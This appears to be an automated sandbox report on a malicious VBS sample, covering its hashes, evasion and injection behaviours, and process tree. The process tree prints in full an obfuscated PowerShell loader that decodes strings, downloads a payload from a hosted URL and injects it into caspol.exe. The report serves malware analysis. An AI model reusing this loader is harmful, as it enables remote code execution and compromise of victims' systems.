Analysis
- max time kernel: 171s
- max time network: 175s
- platform: windows10-2004_x64
- resource: win10v2004-20220812-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20220812-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 09-02-2023 02:13
Static task
- static1
Behavioral task
- behavioral1
  Sample: New items order.vbs
  Resource: win7-20220812-en
Behavioral task
- behavioral2
  Sample: New items order.vbs
  Resource: win10v2004-20220812-en
General
- Target: New items order.vbs
- Size: 53KB
- MD5: 68a4d5e4c541961d428996136e9739aa
- SHA1: ac722c0b712636eb7efbd995035dd149311e0ee9
- SHA256: 0dadaf0eb1832bfa87259ffa7481ab5cfdd40455dd6643858f856afceaf17c14
- SHA512: 379d322247d03e9826ff4bc0de5a849da314f8631b59f0ccf36949e98999f11b84ad564f84e7497755eb333aa0c82381e844a16f6fc533fcec86ddb710e6d517
- SSDEEP: 1536:Y7ApYVwpqGY8n/pevDkFwjYkRaSQSAykbhATO4RWKIRJRa:Y7ApYVIsvDkajJUSaxF4Rj2fa
Malware Config
Signatures
- Blocklisted process makes network request (4 IoCs)
  Processes:
  flow  pid   process
  3     2288  WScript.exe
  16    4356  powershell.exe
  23    4356  powershell.exe
  26    4356  powershell.exe
- Checks QEMU agent file (2 TTPs, 2 IoCs)
  Checks presence of QEMU agent, possibly to detect virtualization.
  Processes:
  description              ioc                                   process
  File opened (read-only)  C:\Program Files\Qemu-ga\qemu-ga.exe  caspol.exe
  File opened (read-only)  C:\Program Files\Qemu-ga\qemu-ga.exe  powershell.exe
- Checks computer location settings (2 TTPs, 1 IoC)
  Looks up country code configured in the registry, likely geofence.
  Processes:
  description        ioc                                                                                                   process
  Key value queried  \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation  WScript.exe
- Legitimate hosting services abused for malware hosting/C2 (1 TTP)
- Suspicious use of NtSetInformationThreadHideFromDebugger (2 IoCs)
  Processes:
  pid   process
  4356  powershell.exe
  1008  caspol.exe
- Suspicious use of SetThreadContext (1 IoC)
  Processes:
  description                          pid   process         target process
  PID 4356 set thread context of 1008  4356  powershell.exe  caspol.exe
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
- Modifies system certificate store
  Processes:
  description       ioc                                                                                                                                     process
  Key created       \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43                   WScript.exe
  Set value (data)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 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  WScript.exe
  Set value (data)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 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  WScript.exe
  Set value (data)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 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  WScript.exe
- Suspicious behavior: EnumeratesProcesses (4 IoCs)
  Processes:
  pid   process
  4600  powershell.exe
  4600  powershell.exe
  4356  powershell.exe
  4356  powershell.exe
- Suspicious behavior: MapViewOfSection (1 IoC)
  Processes:
  pid   process
  4356  powershell.exe
- Suspicious use of AdjustPrivilegeToken (2 IoCs)
  Processes:
  description               pid   process
  Token: SeDebugPrivilege   4600  powershell.exe
  Token: SeDebugPrivilege   4356  powershell.exe
- Suspicious use of WriteProcessMemory (13 IoCs)
  Processes:
  description                        pid   process         target process
  PID 2288 wrote to memory of 3068   2288  WScript.exe     cmd.exe
  PID 2288 wrote to memory of 3068   2288  WScript.exe     cmd.exe
  PID 2288 wrote to memory of 4104   2288  WScript.exe     cmd.exe
  PID 2288 wrote to memory of 4104   2288  WScript.exe     cmd.exe
  PID 2288 wrote to memory of 4600   2288  WScript.exe     powershell.exe
  PID 2288 wrote to memory of 4600   2288  WScript.exe     powershell.exe
  PID 4600 wrote to memory of 4356   4600  powershell.exe  powershell.exe
  PID 4600 wrote to memory of 4356   4600  powershell.exe  powershell.exe
  PID 4600 wrote to memory of 4356   4600  powershell.exe  powershell.exe
  PID 4356 wrote to memory of 1008   4356  powershell.exe  caspol.exe
  PID 4356 wrote to memory of 1008   4356  powershell.exe  caspol.exe
  PID 4356 wrote to memory of 1008   4356  powershell.exe  caspol.exe
  PID 4356 wrote to memory of 1008   4356  powershell.exe  caspol.exe
Processes
-
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\New items order.vbs" (depth 1)
- Blocklisted process makes network request
- Checks computer location settings
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
PID:2288
-
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c echo off (depth 2)
PID:3068
-
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c echo rshell (depth 2)
PID:4104
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Illuminist = """Function Endpaper2211 { param([String]`$Bissedesty); `$Tryk = ''; Write-Host `$Tryk; Write-Host `$Tryk; Write-Host `$Tryk; `$Bollen = New-Object byte[] (`$Bissedesty.Length / 2); For(`$blemos=0; `$blemos -lt `$Bissedesty.Length; `$blemos+=2){ `$Bollen[`$blemos/2] = [convert]::ToByte(`$Bissedesty.Substring(`$blemos, 2), 16); `$Afri = (`$Bollen[`$blemos/2] -bxor 116); `$Bollen[`$blemos/2] = `$Afri; } [String][System.Text.Encoding]::ASCII.GetString(`$Bollen);}`$Prog0=Endpaper2211 '270D070011195A101818';`$Prog1=Endpaper2211 '391D17061B071B12005A231D1A47465A211A071512113A15001D02113911001C1B1007';`$Prog2=Endpaper2211 '33110024061B1735101006110707';`$Prog3=Endpaper2211 '270D070011195A26011A001D19115A3D1A0011061B04271106021D1711075A3C151A101811261112';`$Prog4=Endpaper2211 '0700061D1A13';`$Prog5=Endpaper2211 '331100391B100118113C151A101811';`$Prog6=Endpaper2211 '2620270411171D15183A15191158543C1D1011360D271D135854240116181D17';`$Prog7=Endpaper2211 '26011A001D1911585439151A15131110';`$Prog8=Endpaper2211 '2611121811170011103011181113150011';`$Prog9=Endpaper2211 '3D1A3911191B060D391B10011811';`$Overnou0=Endpaper2211 '390D3011181113150011200D0411';`$Overnou1=Endpaper2211 '37181507075854240116181D1758542711151811105854351A071D371815070758543501001B3718150707';`$Overnou2=Endpaper2211 '3D1A021B1F11';`$Overnou3=Endpaper2211 '240116181D1758543C1D1011360D271D1358543A110327181B005854221D0600011518';`$Overnou4=Endpaper2211 '221D06000115183518181B17';`$Overnou5=Endpaper2211 '1A00101818';`$Overnou6=Endpaper2211 '3A0024061B00111700221D06000115183911191B060D';`$Overnou7=Endpaper2211 '3D312C';`$Overnou8=Endpaper2211 '28';`$Skaaltal=Endpaper2211 '212731264746';`$telefonk=Endpaper2211 '37151818231D1A101B0324061B1735';function fkp {Param (`$Udst, `$Tractorske13) ;`$Journeycak0 =Endpaper2211 
'503D1A10065449545C2F350404301B19151D1A294E4E37010606111A00301B19151D1A5A331100350707111916181D11075C5D540854231C110611593B161E111700540F54502B5A33181B161518350707111916180D3715171C115459351A1054502B5A381B1715001D1B1A5A2704181D005C503B0211061A1B014C5D2F5945295A3105011518075C5024061B13445D54095D5A331100200D04115C5024061B13455D';.(`$Overnou7) `$Journeycak0;`$Journeycak5 = Endpaper2211 '502D1A131811100D1300544954503D1A10065A3311003911001C1B105C5024061B134658542F200D04112F292954345C5024061B134758545024061B13405D5D';.(`$Overnou7) `$Journeycak5;`$Journeycak1 = Endpaper2211 '06110001061A54502D1A131811100D13005A3D1A021B1F115C501A0118185854345C2F270D070011195A26011A001D19115A3D1A0011061B04271106021D1711075A3C151A101811261112295C3A1103593B161E11170054270D070011195A26011A001D19115A3D1A0011061B04271106021D1711075A3C151A1018112611125C5C3A1103593B161E111700543D1A002400065D58545C503D1A10065A3311003911001C1B105C5024061B13415D5D5A3D1A021B1F115C501A0118185854345C50211007005D5D5D5D58545020061517001B06071F1145475D5D';.(`$Overnou7) `$Journeycak1;}function GDT {Param ([Parameter(Position = 0, Mandatory = `$True)] [Type[]] `$Ullagoneae,[Parameter(Position = 1)] [Type] `$Cavourshin = [Void]);`$Journeycak2 = Endpaper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`$Overnou7) `$Journeycak2;`$Journeycak3 = Endpaper2211 '50191507001B105A3011121D1A11371B1A0700060117001B065C5024061B134258542F270D070011195A261112181117001D1B1A5A371518181D1A13371B1A02111A001D1B1A07294E4E2700151A1015061058545021181815131B1A1115115D5A2711003D1904181119111A0015001D1B1A32181513075C5024061B13435D';.(`$Overnou7) `$Journeycak3;`$Journeycak4 = Endpaper2211 '50191507001B105A3011121D1A113911001C1B105C503B0211061A1B01465854503B0211061A1B01475854503715021B0106071C1D1A58545021181815131B1A1115115D5A2711003D1904181119111A0015001D1B1A32181513075C5024061B13435D';.(`$Overnou7) `$Journeycak4;`$Journeycak5 = Endpaper2211 '06110001061A5450191507001B105A370611150011200D04115C5D';.(`$Overnou7) `$Journeycak5 ;}`$Prot = Endpaper2211 
'1F11061A11184746';`$Endpaper2203 = Endpaper2211 '331100371B1A071B1811231D1A101B03';`$Endpaper2200=Endpaper2211 '271C1B03231D1A101B03';`$Endpaper2201 = Endpaper2211 '50261B181811181D0700114541475449542F270D070011195A26011A001D19115A3D1A0011061B04271106021D1711075A391506071C1518294E4E3311003011181113150011321B0632011A17001D1B1A241B1D1A0011065C5C121F045450271F1515180015185450311A100415041106464644445D58545C33302054345C2F3D1A002400062958542F213D1A004746295D545C2F3D1A00240006295D5D5D';.(`$Overnou7) `$Endpaper2201;`$Endpaper2202 = Endpaper2211 '5035181811131D151A5449542F270D070011195A26011A001D19115A3D1A0011061B04271106021D1711075A391506071C1518294E4E3311003011181113150011321B0632011A17001D1B1A241B1D1A0011065C5C121F04545024061B005450311A100415041106464644475D58545C33302054345C2F3D1A00240006295D545C2F3D1A00240006295D5D5D';.(`$Overnou7) `$Endpaper2202;`$Journeycak7 = Endpaper2211 '5007001E105449545035181811131D151A5A3D1A021B1F115C445D';.(`$Overnou7) `$Journeycak7;`$Journeycak7 = Endpaper2211 '50261B181811181D0700114541475A3D1A021B1F115C5007001E105854445D';.(`$Overnou7) `$Journeycak7;`$Journeycak6 = Endpaper2211 '50241B0401181D5449542F270D070011195A26011A001D19115A3D1A0011061B04271106021D1711075A391506071C1518294E4E3311003011181113150011321B0632011A17001D1B1A241B1D1A0011065C5C121F04545024061B0054503B0211061A1B01405D58545C33302054345C2F3D1A002400062958542F213D1A0047462958542F213D1A0047462958542F213D1A004746295D545C2F3D1A00240006295D5D5D';.(`$Overnou7) `$Journeycak6;`$Skinli = fkp `$Overnou5 `$Overnou6;`$Journeycak7 = Endpaper2211 '5020061D171C46464D4754495450241B0401181D5A3D1A021B1F115C2F3D1A00240006294E4E2E11061B585442414C5854440C474444445854440C40445D';.(`$Overnou7) `$Journeycak7;`$Journeycak8 = Endpaper2211 '50391517171B161B54495450241B0401181D5A3D1A021B1F115C2F3D1A00240006294E4E2E11061B5854454D4D424C4444445854440C474444445854440C405D';.(`$Overnou7) `$Journeycak8;`$Endpaper2201 = Endpaper2211 
'1C000004074E5B5B10061D02115A131B1B1318115A171B195B01174B110C041B060049101B031A181B1510521D104945163925042320073C4319423B2227360E0E0C3C1D3825193D392E101519450515';`$Endpaper2200 = Endpaper2211 '503C0118025449545C3A1103593B161E111700543A11005A23111637181D111A005D5A301B031A181B15102700061D1A135C50311A100415041106464644455D';`$Journeycak8 = Endpaper2211 '5020061D171C46464D464950111A024E15040410150015';.(`$Overnou7) `$Journeycak8;`$Trich2292=`$Trich2292+'\Micro.dat';`$Hulv='';if (-not(Test-Path `$Trich2292)) {while (`$Hulv -eq '') {.(`$Overnou7) `$Endpaper2200;Start-Sleep 5;}Set-Content `$Trich2292 `$Hulv;}`$Hulv = Get-Content `$Trich2292;`$Journeycak9 = Endpaper2211 '503E1B01061A110D17151F5449542F270D070011195A371B1A02110600294E4E32061B193615071142402700061D1A135C503C0118025D';.(`$Overnou7) `$Journeycak9;`$Hulv0 = Endpaper2211 '2F270D070011195A26011A001D19115A3D1A0011061B04271106021D1711075A391506071C1518294E4E371B040D5C503E1B01061A110D17151F5854445854545020061D171C46464D47585442414C5D';.(`$Overnou7) `$Hulv0;`$politiks=`$Journeycak.count-658;`$Hulv1 = Endpaper2211 '2F270D070011195A26011A001D19115A3D1A0011061B04271106021D1711075A391506071C1518294E4E371B040D5C503E1B01061A110D17151F585442414C585450391517171B161B585450041B181D001D1F075D';.(`$Overnou7) `$Hulv1;`$Hulv2 = Endpaper2211 '50350718151A00031D5449542F270D070011195A26011A001D19115A3D1A0011061B04271106021D1711075A391506071C1518294E4E3311003011181113150011321B0632011A17001D1B1A241B1D1A0011065C5C121F045450271F151518001518545000111811121B1A1F5D58545C33302054345C2F3D1A002400062958542F3D1A002400062958542F3D1A002400062958542F3D1A002400062958542F3D1A00240006295D545C2F3D1A00240006295D5D5D';.(`$Overnou7) `$Hulv2;`$Hulv3 = Endpaper2211 '50350718151A00031D5A3D1A021B1F115C5020061D171C46464D475850391517171B161B5850271F1D1A181D584458445D';.(`$Overnou7) `$Hulv3#;""";Function Hulv9 { param([String]$Bissedesty); For($blemos=0; $blemos -lt $Bissedesty.Length-1; $blemos+=(0+1)){$Endpaper22 = $Endpaper22 + 
$Bissedesty.Substring($blemos, 1)}; $Endpaper22;}$Jyngine0 = Hulv9 'IEX ';$Jyngine1= Hulv9 $Illuminist;if([IntPtr]::size -eq 8){.$env:windir\S*64\W*Power*\v1.0\*ll.exe $Jyngine1 ;}else{.$Jyngine0 $Jyngine1;}" (depth 2)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4600
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "Function Endpaper2211 { param([String]$Bissedesty); $Tryk = ''; Write-Host $Tryk; Write-Host $Tryk; Write-Host $Tryk; $Bollen = New-Object byte[] ($Bissedesty.Length / 2); For($blemos=0; $blemos -lt $Bissedesty.Length; $blemos+=2){ $Bollen[$blemos/2] = [convert]::ToByte($Bissedesty.Substring($blemos, 2), 16); $Afri = ($Bollen[$blemos/2] -bxor 116); $Bollen[$blemos/2] = $Afri; } [String][System.Text.Encoding]::ASCII.GetString($Bollen);}$Prog0=Endpaper2211 '270D070011195A101818';$Prog1=Endpaper2211 '391D17061B071B12005A231D1A47465A211A071512113A15001D02113911001C1B1007';$Prog2=Endpaper2211 '33110024061B1735101006110707';$Prog3=Endpaper2211 '270D070011195A26011A001D19115A3D1A0011061B04271106021D1711075A3C151A101811261112';$Prog4=Endpaper2211 '0700061D1A13';$Prog5=Endpaper2211 '331100391B100118113C151A101811';$Prog6=Endpaper2211 '2620270411171D15183A15191158543C1D1011360D271D135854240116181D17';$Prog7=Endpaper2211 '26011A001D1911585439151A15131110';$Prog8=Endpaper2211 '2611121811170011103011181113150011';$Prog9=Endpaper2211 '3D1A3911191B060D391B10011811';$Overnou0=Endpaper2211 '390D3011181113150011200D0411';$Overnou1=Endpaper2211 '37181507075854240116181D1758542711151811105854351A071D371815070758543501001B3718150707';$Overnou2=Endpaper2211 '3D1A021B1F11';$Overnou3=Endpaper2211 '240116181D1758543C1D1011360D271D1358543A110327181B005854221D0600011518';$Overnou4=Endpaper2211 '221D06000115183518181B17';$Overnou5=Endpaper2211 '1A00101818';$Overnou6=Endpaper2211 '3A0024061B00111700221D06000115183911191B060D';$Overnou7=Endpaper2211 '3D312C';$Overnou8=Endpaper2211 '28';$Skaaltal=Endpaper2211 '212731264746';$telefonk=Endpaper2211 '37151818231D1A101B0324061B1735';function fkp {Param ($Udst, $Tractorske13) ;$Journeycak0 =Endpaper2211 
'503D1A10065449545C2F350404301B19151D1A294E4E37010606111A00301B19151D1A5A331100350707111916181D11075C5D540854231C110611593B161E111700540F54502B5A33181B161518350707111916180D3715171C115459351A1054502B5A381B1715001D1B1A5A2704181D005C503B0211061A1B014C5D2F5945295A3105011518075C5024061B13445D54095D5A331100200D04115C5024061B13455D';.($Overnou7) $Journeycak0;$Journeycak5 = Endpaper2211 '502D1A131811100D1300544954503D1A10065A3311003911001C1B105C5024061B134658542F200D04112F292954345C5024061B134758545024061B13405D5D';.($Overnou7) $Journeycak5;$Journeycak1 = Endpaper2211 '06110001061A54502D1A131811100D13005A3D1A021B1F115C501A0118185854345C2F270D070011195A26011A001D19115A3D1A0011061B04271106021D1711075A3C151A101811261112295C3A1103593B161E11170054270D070011195A26011A001D19115A3D1A0011061B04271106021D1711075A3C151A1018112611125C5C3A1103593B161E111700543D1A002400065D58545C503D1A10065A3311003911001C1B105C5024061B13415D5D5A3D1A021B1F115C501A0118185854345C50211007005D5D5D5D58545020061517001B06071F1145475D5D';.($Overnou7) $Journeycak1;}function GDT {Param ([Parameter(Position = 0, Mandatory = $True)] [Type[]] $Ullagoneae,[Parameter(Position = 1)] [Type] $Cavourshin = [Void]);$Journeycak2 = Endpaper2211 '50191507001B105449542F350404301B19151D1A294E4E37010606111A00301B19151D1A5A3011121D1A11300D1A15191D17350707111916180D5C5C3A1103593B161E11170054270D070011195A261112181117001D1B1A5A350707111916180D3A1519115C5024061B134C5D5D58542F270D070011195A261112181117001D1B1A5A31191D005A350707111916180D36011D18101106351717110707294E4E26011A5D5A3011121D1A11300D1A15191D17391B100118115C5024061B134D58545012151807115D5A3011121D1A11200D04115C503B0211061A1B01445854503B0211061A1B014558542F270D070011195A390118001D171507003011181113150011295D';.($Overnou7) $Journeycak2;$Journeycak3 = Endpaper2211 
'50191507001B105A3011121D1A11371B1A0700060117001B065C5024061B134258542F270D070011195A261112181117001D1B1A5A371518181D1A13371B1A02111A001D1B1A07294E4E2700151A1015061058545021181815131B1A1115115D5A2711003D1904181119111A0015001D1B1A32181513075C5024061B13435D';.($Overnou7) $Journeycak3;$Journeycak4 = Endpaper2211 '50191507001B105A3011121D1A113911001C1B105C503B0211061A1B01465854503B0211061A1B01475854503715021B0106071C1D1A58545021181815131B1A1115115D5A2711003D1904181119111A0015001D1B1A32181513075C5024061B13435D';.($Overnou7) $Journeycak4;$Journeycak5 = Endpaper2211 '06110001061A5450191507001B105A370611150011200D04115C5D';.($Overnou7) $Journeycak5 ;}$Prot = Endpaper2211 '1F11061A11184746';$Endpaper2203 = Endpaper2211 '331100371B1A071B1811231D1A101B03';$Endpaper2200=Endpaper2211 '271C1B03231D1A101B03';$Endpaper2201 = Endpaper2211 '50261B181811181D0700114541475449542F270D070011195A26011A001D19115A3D1A0011061B04271106021D1711075A391506071C1518294E4E3311003011181113150011321B0632011A17001D1B1A241B1D1A0011065C5C121F045450271F1515180015185450311A100415041106464644445D58545C33302054345C2F3D1A002400062958542F213D1A004746295D545C2F3D1A00240006295D5D5D';.($Overnou7) $Endpaper2201;$Endpaper2202 = Endpaper2211 '5035181811131D151A5449542F270D070011195A26011A001D19115A3D1A0011061B04271106021D1711075A391506071C1518294E4E3311003011181113150011321B0632011A17001D1B1A241B1D1A0011065C5C121F04545024061B005450311A100415041106464644475D58545C33302054345C2F3D1A00240006295D545C2F3D1A00240006295D5D5D';.($Overnou7) $Endpaper2202;$Journeycak7 = Endpaper2211 '5007001E105449545035181811131D151A5A3D1A021B1F115C445D';.($Overnou7) $Journeycak7;$Journeycak7 = Endpaper2211 '50261B181811181D0700114541475A3D1A021B1F115C5007001E105854445D';.($Overnou7) $Journeycak7;$Journeycak6 = Endpaper2211 
'50241B0401181D5449542F270D070011195A26011A001D19115A3D1A0011061B04271106021D1711075A391506071C1518294E4E3311003011181113150011321B0632011A17001D1B1A241B1D1A0011065C5C121F04545024061B0054503B0211061A1B01405D58545C33302054345C2F3D1A002400062958542F213D1A0047462958542F213D1A0047462958542F213D1A004746295D545C2F3D1A00240006295D5D5D';.($Overnou7) $Journeycak6;$Skinli = fkp $Overnou5 $Overnou6;$Journeycak7 = Endpaper2211 '5020061D171C46464D4754495450241B0401181D5A3D1A021B1F115C2F3D1A00240006294E4E2E11061B585442414C5854440C474444445854440C40445D';.($Overnou7) $Journeycak7;$Journeycak8 = Endpaper2211 '50391517171B161B54495450241B0401181D5A3D1A021B1F115C2F3D1A00240006294E4E2E11061B5854454D4D424C4444445854440C474444445854440C405D';.($Overnou7) $Journeycak8;$Endpaper2201 = Endpaper2211 '1C000004074E5B5B10061D02115A131B1B1318115A171B195B01174B110C041B060049101B031A181B1510521D104945163925042320073C4319423B2227360E0E0C3C1D3825193D392E101519450515';$Endpaper2200 = Endpaper2211 '503C0118025449545C3A1103593B161E111700543A11005A23111637181D111A005D5A301B031A181B15102700061D1A135C50311A100415041106464644455D';$Journeycak8 = Endpaper2211 '5020061D171C46464D464950111A024E15040410150015';.($Overnou7) $Journeycak8;$Trich2292=$Trich2292+'\Micro.dat';$Hulv='';if (-not(Test-Path $Trich2292)) {while ($Hulv -eq '') {.($Overnou7) $Endpaper2200;Start-Sleep 5;}Set-Content $Trich2292 $Hulv;}$Hulv = Get-Content $Trich2292;$Journeycak9 = Endpaper2211 '503E1B01061A110D17151F5449542F270D070011195A371B1A02110600294E4E32061B193615071142402700061D1A135C503C0118025D';.($Overnou7) $Journeycak9;$Hulv0 = Endpaper2211 '2F270D070011195A26011A001D19115A3D1A0011061B04271106021D1711075A391506071C1518294E4E371B040D5C503E1B01061A110D17151F5854445854545020061D171C46464D47585442414C5D';.($Overnou7) $Hulv0;$politiks=$Journeycak.count-658;$Hulv1 = Endpaper2211 
'2F270D070011195A26011A001D19115A3D1A0011061B04271106021D1711075A391506071C1518294E4E371B040D5C503E1B01061A110D17151F585442414C585450391517171B161B585450041B181D001D1F075D';.($Overnou7) $Hulv1;$Hulv2 = Endpaper2211 '50350718151A00031D5449542F270D070011195A26011A001D19115A3D1A0011061B04271106021D1711075A391506071C1518294E4E3311003011181113150011321B0632011A17001D1B1A241B1D1A0011065C5C121F045450271F151518001518545000111811121B1A1F5D58545C33302054345C2F3D1A002400062958542F3D1A002400062958542F3D1A002400062958542F3D1A002400062958542F3D1A00240006295D545C2F3D1A00240006295D5D5D';.($Overnou7) $Hulv2;$Hulv3 = Endpaper2211 '50350718151A00031D5A3D1A021B1F115C5020061D171C46464D475850391517171B161B5850271F1D1A181D584458445D';.($Overnou7) $Hulv3#" (depth 3)
- Blocklisted process makes network request
- Checks QEMU agent file
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4356
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe" (depth 4)
- Checks QEMU agent file
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1008
Network
MITRE ATT&CK Enterprise v6
Downloads
- memory/1008-153-0x0000000000000000-mapping.dmp
- memory/1008-160-0x0000000077CF0000-0x0000000077E93000-memory.dmp (Filesize: 1.6MB)
- memory/1008-159-0x00007FF93BAB0000-0x00007FF93BCA5000-memory.dmp (Filesize: 2.0MB)
- memory/1008-158-0x0000000000D20000-0x000000000202B000-memory.dmp (Filesize: 19.0MB)
- memory/1008-157-0x0000000077CF0000-0x0000000077E93000-memory.dmp (Filesize: 1.6MB)
- memory/1008-156-0x00007FF93BAB0000-0x00007FF93BCA5000-memory.dmp (Filesize: 2.0MB)
- memory/1008-155-0x0000000000D20000-0x000000000202B000-memory.dmp (Filesize: 19.0MB)
- memory/3068-132-0x0000000000000000-mapping.dmp
- memory/4104-133-0x0000000000000000-mapping.dmp
- memory/4356-139-0x0000000004F60000-0x0000000005588000-memory.dmp (Filesize: 6.2MB)
- memory/4356-150-0x0000000007CC0000-0x0000000008FCB000-memory.dmp (Filesize: 19.0MB)
- memory/4356-143-0x0000000005CE0000-0x0000000005CFE000-memory.dmp (Filesize: 120KB)
- memory/4356-144-0x0000000007640000-0x0000000007CBA000-memory.dmp (Filesize: 6.5MB)
- memory/4356-145-0x0000000006240000-0x000000000625A000-memory.dmp (Filesize: 104KB)
- memory/4356-146-0x0000000006FC0000-0x0000000007056000-memory.dmp (Filesize: 600KB)
- memory/4356-147-0x0000000006F10000-0x0000000006F32000-memory.dmp (Filesize: 136KB)
- memory/4356-148-0x0000000008FD0000-0x0000000009574000-memory.dmp (Filesize: 5.6MB)
- memory/4356-137-0x0000000000000000-mapping.dmp
- memory/4356-142-0x0000000005600000-0x0000000005666000-memory.dmp (Filesize: 408KB)
- memory/4356-151-0x00007FF93BAB0000-0x00007FF93BCA5000-memory.dmp (Filesize: 2.0MB)
- memory/4356-152-0x0000000077CF0000-0x0000000077E93000-memory.dmp (Filesize: 1.6MB)
- memory/4356-141-0x0000000004EB0000-0x0000000004F16000-memory.dmp (Filesize: 408KB)
- memory/4356-154-0x0000000077CF0000-0x0000000077E93000-memory.dmp (Filesize: 1.6MB)
- memory/4356-140-0x0000000004E10000-0x0000000004E32000-memory.dmp (Filesize: 136KB)
- memory/4356-138-0x0000000004730000-0x0000000004766000-memory.dmp (Filesize: 216KB)
- memory/4600-149-0x00007FF91DE10000-0x00007FF91E8D1000-memory.dmp (Filesize: 10.8MB)
- memory/4600-136-0x00007FF91DE10000-0x00007FF91E8D1000-memory.dmp (Filesize: 10.8MB)
- memory/4600-135-0x00000198C0CC0000-0x00000198C0CE2000-memory.dmp (Filesize: 136KB)
- memory/4600-134-0x0000000000000000-mapping.dmp